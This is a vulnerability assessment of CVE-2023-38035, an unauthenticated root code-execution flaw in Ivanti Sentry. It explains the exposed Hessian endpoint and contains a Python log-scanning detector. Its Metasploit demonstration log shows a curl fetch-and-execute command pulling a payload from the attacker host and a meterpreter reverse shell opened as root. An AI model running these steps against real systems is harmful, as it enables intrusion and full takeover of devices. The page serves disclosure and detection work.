Attacker Value: Very High (1 user assessed)
Exploitability: Very High (1 user assessed)
User Interaction: None
Privileges Required: None
Attack Vector: Network

CVE-2023-38035

Disclosure Date: August 21, 2023
Exploited in the Wild
MITRE ATT&CK tactics:

  • Execution (Validated)
  • Initial Access (Validated)
  • Privilege Escalation (Validated)

Description

A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.

Technical Analysis

Description

Ivanti Sentry (formerly MobileIron Sentry) is vulnerable to an authentication bypass which exposes API functionality which allows for code execution in the context of the root user. The vulnerable endpoint /mics/services/MICSLogService exposes a binary web service protocol, Hessian, which allows remote users to invoke functions within the target Sentry system.

One of the functions accessible via Hessian and the vulnerable endpoint is uploadFileUsingFileInput, which accepts a command argument that gets directly fed into a Runtime.getRuntime().exec(cmd) call. The command is run in the context of the tomcat2 user; however, by default tomcat2 is able to execute commands with sudo, thus we can use this to execute the payload in the context of the root user.

Attacker Value and Exploitability

For attackers, this one is pretty juicy as it gives unauthenticated RCE in the context of the root user; it doesn’t get much better than that. Seeing CVE-2023-38035 being added to the KEV list only one day after it was published speaks volumes about its usefulness to malicious adversaries. To the attacker’s benefit, there aren’t any definitive IoCs other than unrecognized HTTP requests to /services/*, which should be cause for concern. The only saving grace is that a Shodan search for Ivanti Sentry targets on the internet only yielded around 500 vulnerable instances exposed at the time the vuln was disclosed.

Vulnerable Versions

Ivanti Sentry versions vulnerable to CVE-2023-38035:

  • <= 9.18.0

Vulnerable Environment

A vulnerable MobileIron Sentry version 9.12.0-16 .vhd file can be downloaded from the following URL

Metasploit Module Demonstration

msf6 > use linux/http/ivanti_sentry_misc_log_service
[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set rhosts 192.168.1.78
rhosts => 192.168.1.78
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set lhost 192.168.1.72
lhost => 192.168.1.72
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set fetch_srvhost 192.168.1.72
fetch_srvhost => 192.168.1.72
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set verbose true
verbose => true
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > exploit
[*] Reloading module...

[*] Command to run on remote host: curl -so /tmp/ccrjHXsc http://192.168.1.72:8080/etRbFA76UzDRclkL8zrTdg; chmod +x /tmp/ccrjHXsc; /tmp/ccrjHXsc &
[*] Fetch Handler listening on 192.168.1.72:8080
[*] HTTP server started
[*] Adding resource /etRbFA76UzDRclkL8zrTdg
[*] Started reverse TCP handler on 192.168.1.72:4443
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing Unix (In-Memory) for cmd/linux/http/x64/meterpreter_reverse_tcp
[*] Running the command: sudo curl -so /tmp/ccrjHXsc http://192.168.1.72:8080/etRbFA76UzDRclkL8zrTdg
[*] Client 192.168.1.78 requested /etRbFA76UzDRclkL8zrTdg
[*] Sending payload to 192.168.1.78 (curl/7.29.0)
[*] Running the command: sudo  chmod +x /tmp/ccrjHXsc
[*] Running the command: sudo  /tmp/ccrjHXsc &
[*] Meterpreter session 6 opened (192.168.1.72:4443 -> 192.168.1.78:40550) at 2023-08-29 14:27:57 -0400

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.8.2003 (Linux 3.10.0-1160.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit
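
The assessment above names unrecognized HTTP requests to /services/* as the only indicator for this issue. As an added example (not part of the original assessment and not Ivanti or Rapid7 code), the following Python scans access-log lines for requests to those service paths and groups them by client. It assumes the Apache combined log format; the sample lines, the admin network range and the function names are constructed for illustration.

```python
import ipaddress
import posixpath
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# Apache "combined" access-log layout (assumed format for the portal's logs).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+')
# Paths named on the page: /mics/services/MICSLogService and /services/*.
SERVICE_RE = re.compile(r'^/(?:mics/)?services(?:/|$)', re.IGNORECASE)

SAMPLE_LOG = [  # constructed sample lines using documentation IP ranges
    '198.51.100.23 - - [22/Aug/2023:03:14:07 +0000] "POST /mics/services/MICSLogService HTTP/1.1" 200 87 "-" "-"',
    '10.20.0.5 - admin [22/Aug/2023:09:01:44 +0000] "GET /mics/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [22/Aug/2023:03:20:31 +0000] "POST /mics//services/MICSLogService HTTP/1.1" 200 87 "-" "-"',
    '10.20.0.5 - admin [22/Aug/2023:09:05:10 +0000] "POST /services/MICSLogService HTTP/1.1" 401 0 "-" "Mozilla/5.0"',
]


def normalize(target):
    """Decode and collapse a request target so the match does not depend on how it was written."""
    path = urlsplit(target).path
    for _ in range(2):  # undo single and double percent-encoding
        path = unquote(path)
    path = re.sub(r'/+', '/', path.replace('\\', '/'))
    return posixpath.normpath(path) if path else '/'


def find_service_hits(lines, admin_nets=()):
    """Return {client_ip: [hit, ...]} for requests to the service paths."""
    nets = [ipaddress.ip_network(n) for n in admin_nets]
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        path = normalize(m['target']) if m else ''
        if not SERVICE_RE.match(path):
            continue
        try:
            known = any(ipaddress.ip_address(m['ip']) in n for n in nets)
        except ValueError:  # client field is a hostname, not an IP
            known = False
        hits[m['ip']].append({
            'time': m['ts'], 'method': m['method'], 'path': path,
            'status': int(m['status']), 'from_admin_net': known,
        })
    return dict(hits)
```

Hits with from_admin_net set to False and a 2xx status are the ones to triage first, since the service paths should not be answering clients outside the management network.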

CVSS V3 Severity and Metrics

Base Score: 9.8 Critical
Impact Score: 5.9
Exploitability Score: 3.9
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High

General Information

Vendors

  • ivanti

Products

  • mobileiron sentry
